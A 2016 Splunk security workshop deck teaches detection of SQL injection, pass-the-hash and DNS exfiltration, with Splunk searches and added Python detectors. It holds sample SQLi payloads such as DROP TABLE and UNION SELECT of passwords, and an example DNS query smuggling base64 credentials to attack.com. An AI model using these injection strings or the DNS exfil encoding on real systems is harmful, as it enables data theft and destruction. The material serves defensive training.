Splunk Enterprise for InfoSec Hands-On


Security Hands-On: What’s Your Sign?

Aquarius – 01
Pisces (A~M) – 02
Pisces (N~Z) – 03
Aries – 04
Taurus (A~M) – 05
Taurus (N~Z) – 06
Gemini (A~M) – 07
Gemini (N~Z) – 08
Cancer (A~M) – 09
Cancer (N~Z) – 10
Leo – 11
Virgo (A~M) – 12
Virgo (N~Z) – 13
Libra (A~M) – 14
Libra (N~Z) – 15
Scorpio (A~M) – 16
Scorpio (N~Z) – 17
Sagittarius – 18
Capricorn (A~M) – 19
Capricorn (N~Z) – 20

https://od-splunklivesantaclara-XX.splunkoxygen.com
Username: splunklive  Password: security

Copyright © 2016 Splunk Inc.

Splunk Enterprise for Information Security

Hands-On, Santa Clara | November 10, 2016

Presenters: Chris Shobert & Lily Lee


Agenda

• Intro
• Web Attacks
• Lateral Movement
• DNS Exfiltration
• Wrap-up / Q&A


Intro

Machine data contains a definitive record of all interactions.

Splunk is a very effective platform to collect, store, and analyze all of that data.

[Slide graphic: Platform for Machine Data. Human-to-machine and machine-to-machine data sources: mainframe data, relational databases, mobile, forwarders, syslog/TCP/other, sensors & control systems, wire data.]

[Slide graphic: Splunk Solutions > Easy to Adopt, across data sources, use cases & consumption models. Splunk premium solutions & apps (ITSI / IT Service Intelligence, UBA, PCI, Security) and a rich ecosystem of apps (VMware, Exchange, Cisco, PAN, SNOW, AWS).]

Splunk Positioned as a Leader in Gartner 2016 Magic Quadrant for Security Information and Event Management*

• Four years in a row as a leader
• Furthest overall in Completeness of Vision
• Splunk also scores highest in 2016 Critical Capabilities for SIEM report in all three use cases

* Gartner, Inc., 2016 Magic Quadrant for Security Information and Event Management, and Critical Capabilities for Security Information and Event Management, Oliver Rochford, Kelly M. Kavanagh, Toby Bussa, 10 August 2016. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Splunk. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner Critical Capabilities for SIEM


1. Basic Security Monitoring
2. Advanced Threat Detection
3. Forensics & Incident Response


Web Attacks

OWASP 2013 Top 10

[1] Injection: SQL injection, code injection, OS commanding, LDAP injection, XML injection, XPath injection, SSI injection, IMAP/SMTP injection, buffer overflow
[2] Broken authentication and session management
[3] Cross-site scripting (XSS)
[4] Insecure direct object reference
[5] Security misconfiguration
[6] Sensitive data exposure
[7] Missing function level access control
[8] Cross-site request forgery
[9] Using components with known vulnerabilities
[10] Unvalidated redirects and forwards

Why did I get breached?

SQLi has been around a very, very long time…

Source: Imperva Web Attacks Report, 2015

TalkTalk: PII/financial data for 4M customers
VTech: PII for 5M adults + kids

…and so far this year… 45

Little Bobby Tables

Why Did Bobby’s School Lose Their Records?

    $sql = "INSERT INTO Students (Name) VALUES ('" . $studentName . "');";
    execute_sql($sql);

1. $studentName = John
2. INSERT INTO Students (Name) VALUES ('John');

1. $studentName = Robert'); DROP TABLE Students;--
2. INSERT INTO Students (Name) VALUES ('Robert'); DROP TABLE Students;--');

Let’s get hands-on!


A Little About Our Environment

Our learning environment consists of ~5.5M events, from real environments, but sanitized:

• Windows Security events
• Apache web access logs
• Bro DNS & HTTP
• Palo Alto traffic logs
• Some other various bits

Are You a Newbie or Ninja?

Let’s get hands-on!

Web Attacks

https://splunkbase.splunk.com/app/1528/

Search for possible SQL injection in your events:
• looks for patterns in the URI query field to see if anyone has injected them with SQL statements
• uses standard deviations that are 2.5 times greater than the average length of your URI query field

Macros used
• sqlinjection_pattern(sourcetype, uri query field)
• sqlinjection_stats(sourcetype, uri query field)

`sqlinjection_rex` is a search macro. It contains:

(?<injection>(?i)select.*?from|union.*?select|\'$|delete.*?from|update.*?set|alter.*?table|([\%27|\'](%20)*=(%20)*[\%27|\'])|\w*[%27|\']or)

Which means: in the string we are given, look for ANY of the following matches and put that into the “injection” field.

• Anything containing SELECT followed by FROM
• Anything containing UNION followed by SELECT
• Anything with a ‘ at the end
• Anything containing DELETE followed by FROM
• Anything containing UPDATE followed by SET
• Anything containing ALTER followed by TABLE
• A %27 OR a ‘ and then a %20 and any amount of characters then a %20 and then a %27 OR a ‘
• Any amount of word characters followed by a %27 OR a ‘ and then “or”

Note: %27 is encoded “’” and %20 is encoded <space>

Regular Expressions FTW
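As an added example (not the SQL Injection Search app's code nor the deck's), the macro's regex ported to Python next to the app's length rule under one assumed reading (flag queries longer than mean + 2.5 standard deviations), run over constructed uri_query values; the Bobby Tables payload shows a case the pattern misses but the length check catches.

```python
import re
import statistics

# The sqlinjection_rex macro quoted above, in Python syntax: (?<name>...) becomes
# (?P<name>...) and (?i) moves to re.IGNORECASE (Python 3.11+ rejects it mid-pattern).
SQLI_PATTERN = re.compile(
    r"(?P<injection>select.*?from|union.*?select|\'$|delete.*?from|update.*?set"
    r"|alter.*?table|([\%27|\'](%20)*=(%20)*[\%27|\'])|\w*[%27|\']or)",
    re.IGNORECASE,
)

def match_injection(uri_query):
    """Text that would land in the 'injection' field, or None when the pattern is silent."""
    m = SQLI_PATTERN.search(uri_query)
    return m.group("injection") if m else None

def length_outliers(uri_queries, factor=2.5):
    """Queries longer than mean + factor * sample stdev of the batch: an assumed reading
    of the deck's '2.5 times' rule, which the slide does not spell out."""
    lengths = [len(q) for q in uri_queries]
    threshold = statistics.mean(lengths) + factor * statistics.stdev(lengths)
    return [q for q in uri_queries if len(q) > threshold]

# Constructed uri_query values, still URL-encoded as an Apache access log carries them.
BASELINE = [f"id={n}" for n in range(100, 130)] + [
    "q=shoes&page=2", "q=boots&page=1", "cat=7&sort=asc"]
SUSPECT = [
    "id=1%20UNION%20SELECT%20username,password%20FROM%20users",  # UNION-based read
    "user=admin%27%20or%20%271%27=%271",                           # encoded ' or '1'='1
    "name=Robert%27);%20DROP%20TABLE%20Students;--",               # Little Bobby Tables
]

def triage(uri_queries):
    """For each query, the checks that fire: 'pattern', 'length', both, or neither.
    The macro has no DROP alternative, so Bobby's payload is caught by length alone."""
    outliers = set(length_outliers(uri_queries))
    verdicts = {}
    for q in uri_queries:
        reasons = []
        if match_injection(q):
            reasons.append("pattern")
        if q in outliers:
            reasons.append("length")
        verdicts[q] = reasons
    return verdicts

if __name__ == "__main__":
    for q, reasons in triage(BASELINE + SUSPECT).items():
        if reasons:
            print(f"{' + '.join(reasons):>18}  {q}")
```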

Bonus: Try out the SQL Injection Search app!

Summary: Web Attacks / SQL Injection
• SQL injection provides attackers with easy access to data
• Detecting advanced SQL injection is hard – use an app!
• Understand where SQLi is happening on your network and put a stop to it
• Augment your WAF with enterprise-wide Splunk searches


Lateral Movement

Poking Around

An attacker hacks a non-privileged user system.

So what?

Lateral Movement is the expansion of systems controlled, and data accessed.

Most Famous Lateral Movement Attack? (excluding password re-use)

Pass the Hash!

This and other techniques used in destructive Sands breach…

…and at Sony, too.

Detecting Legacy PtH

Look for Windows Events:
• Event ID: 4624 or 4625
• Logon type: 3
• Auth package: NTLM
• User account is not a domain logon, or Anonymous Logon

…this is trivially easy in Splunk

Let’s get hands-on!

Lateral Movement: Legacy

Then It Got Harder
• Pass the Hash tools have improved
• Tracking of jitter, other metrics
• So let’s detect lateral movement differently

Network Traffic Provides Source of Truth
• I usually talk to 10 hosts
• Then one day I talk to 10,000 hosts
• ALARM!

Let’s get hands-on!

Lateral Movement: Network Traffic

iz so hard… u haz magic?

Come see UBA at the demo booths

Summary: Lateral Movement
• Attacker success defines scope of a breach
• High difficulty, high importance
• Worth doing in Splunk
• Easy with UBA


DNS Exfiltration

domain=corp;user=dave;password=12345

  → encrypt →

DNS Query: ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com

DNS exfil tends to be overlooked within an ocean of DNS data.

Let’s fix that!

DNS Exfiltration

FrameworkPOS: a card-stealing program that exfiltrates data from the target’s network by transmitting it as domain name system (DNS) traffic.

“But the big difference is the way how stolen data is exfiltrated: the malware used DNS requests!”
https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests

“…few organizations actually keep detailed logs or records of the DNS traffic traversing their networks — making it an ideal way to siphon data from a hacked network.”
http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-beauty-breach/#more-30872

https://splunkbase.splunk.com/app/2734/

DNS exfil detection – tricks of the trade
• parse URLs & complicated TLDs (Top Level Domain)
• calculate Shannon Entropy

List of provided lookups
• ut_parse_simple(url)
• ut_parse(url, list) or ut_parse_extended(url, list)
• ut_shannon(word)
• ut_countset(word, set)
• ut_suites(word, sets)
• ut_meaning(word)
• ut_bayesian(word)
• ut_levenshtein(word1, word2)

Shannon Entropy

Layman’s definition: a score reflecting the randomness or measure of uncertainty of a string

Examples
• The domain aaaaa.com has a Shannon Entropy score of 1.8 (very low)
• The domain google.com has a Shannon Entropy score of 2.6 (rather low)
• A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com has a Shannon Entropy score of 3 (rather high)

Detecting Data Exfiltration

index=bro sourcetype=bro_dns | `ut_parse(query)` | `ut_shannon(ut_subdomain)` | eval sublen = len(ut_subdomain) | table ut_domain ut_subdomain ut_shannon sublen

Tips
• Leverage our Bro DNS data
• Calculate Shannon Entropy scores
• Calculate subdomain length
• Display details

Let’s get hands-on!

Lateral Movement: DNS Exfiltration

Detecting Data Exfiltration

… | stats count avg(ut_shannon) as avg_sha avg(sublen) as avg_sublen stdev(sublen) as stdev_sublen by ut_domain | search avg_sha>3 avg_sublen>20 stdev_sublen<2

Tips
• Leverage our Bro DNS data
• Calculate Shannon Entropy scores
• Calculate subdomain length
• Display count, scores, lengths, deviations

Results
• Exfiltrating data requires many DNS requests – look for high counts
• DNS exfiltration to mooo.com and chickenkiller.com
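An added example, not the URL Toolbox app's code, that reproduces the two searches above in Python over constructed Bro-style DNS queries: ut_shannon as log2 entropy (checked against the deck's aaaaa.com and google.com scores), a simplified ut_parse (assumption: the last two labels are the registered domain) and the stats/search thresholds; exfil.example is a placeholder attacker domain.

```python
import base64
import math
import statistics
from collections import Counter, defaultdict

def shannon_entropy(word):
    """Shannon entropy in bits per character, the score ut_shannon reports on the deck."""
    n = len(word)
    return -sum((c / n) * math.log2(c / n) for c in Counter(word).values()) if n else 0.0

def split_query(query):
    """Assumed simplification of ut_parse: the last two labels are the registered
    domain and everything before them is the subdomain (no co.uk-style TLD list)."""
    labels = query.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def suspicious_domains(queries, min_sha=3.0, min_sublen=20, max_stdev=2.0):
    """The deck's pipeline: per ut_domain, count, avg(ut_shannon), avg(sublen) and
    stdev(sublen), then keep domains with avg_sha>3, avg_sublen>20, stdev_sublen<2."""
    per_domain = defaultdict(list)
    for q in queries:
        domain, sub = split_query(q)
        per_domain[domain].append((shannon_entropy(sub), len(sub)))
    hits = {}
    for domain, rows in per_domain.items():
        if len(rows) < 2:          # stdev needs two samples; Splunk would return null
            continue
        shas, lens = [s for s, _ in rows], [l for _, l in rows]
        avg_sha, avg_len = statistics.mean(shas), statistics.mean(lens)
        sd_len = statistics.stdev(lens)
        if avg_sha > min_sha and avg_len > min_sublen and sd_len < max_stdev:
            hits[domain] = {"count": len(rows), "avg_sha": round(avg_sha, 2),
                            "avg_sublen": round(avg_len, 1), "stdev_sublen": round(sd_len, 1)}
    return hits

# Constructed sample: the deck's "domain=corp;user=dave;password=12345" record, extended,
# chopped into 30-byte pieces padded to a fixed size, base64-encoded and sent as subdomains
# of a placeholder attacker domain (exfil.example), mixed with ordinary lookups.
SECRET = b"domain=corp;user=dave;password=12345;card=4111111111111111;exp=12/19;cvv=123;zip=950541234"
CHUNKS = [SECRET[i:i + 30].ljust(30, b" ") for i in range(0, len(SECRET), 30)]
SAMPLE_QUERIES = ["www.google.com", "mail.google.com", "cdn.example.net", "www.example.net"] + [
    base64.b64encode(c).decode() + ".exfil.example" for c in CHUNKS]

if __name__ == "__main__":
    for domain, stats in suspicious_domains(SAMPLE_QUERIES).items():
        print(domain, stats)
```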

Summary: DNS Exfiltration
• Exfiltration by DNS and ICMP is a very common technique
• Many organizations do not analyze DNS activity – do not be like them!
• No DNS logs? No Splunk Stream? Look at FW byte counts


Wrap-up / Q&A

Summary
• Multiple phases to modern attacks
• Deploy detection across all phases
• Also consider adaptive response!
• Stay abreast of modern advancements

Today’s content (PDF):
https://splunk.box.com/v/SplunkLive-Security-Handout

The 8th Annual Splunk Worldwide Users’ Conference
Sept 25-28, 2017, Walter E. Washington Convention Center, Washington, D.C. – CONF.SPLUNK.COM
• 5,000+ IT and Business Professionals
• 175+ Sessions
• 80+ Customer Speakers

PLUS Splunk University
• Three days: Sept 23-25, 2017
• Get Splunk Certified for FREE!
• Get CPE credits for CISSP, CAP, SSCP

Thank You
